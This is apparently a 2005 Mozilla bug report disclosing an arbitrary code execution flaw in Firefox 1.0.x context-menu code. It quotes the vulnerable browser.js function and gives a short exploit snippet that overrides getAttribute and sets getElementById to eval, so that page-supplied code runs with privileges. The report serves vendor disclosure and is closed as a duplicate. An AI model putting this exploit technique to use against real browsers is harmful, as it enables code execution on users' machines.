User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319 Vulnerability: arbitrary code execution Vulnerable code: from nsContextMenu.prototype.setTarget() in browser.js if ( this.target.nodeType == Node.ELEMENT_NODE ) { if ( this.target.localName.toUpperCase() == "IMG" ) { this.onImage = true; this.imageURL = this.target.src; // Look for image map. var mapName = this.target.getAttribute( "usemap" ); if ( mapName ) { // Find map. var map = this.target.ownerDocument.getElementById( mapName.substr(1) ); Exploit: Web pages can overwrite the getAttribute and getElementById methods, such as the following. document.images[0].getAttribute = function() { return { substr : function() { return MALICIOUS_CODE; } }; }; document.getElementById = eval; I have confirmed that the following testcase works in: [Firefox] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404 Firefox/1.0.3 [Mozilla Suite] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404 Reproducible: Always Steps to Reproduce:

Note that the testcase doesn't seem to exploit on trunk gecko.

Same eval problem as reported in bug 289074. *** This bug has been marked as a duplicate of 289074 *** *** This bug has been marked as a duplicate of 289074 ***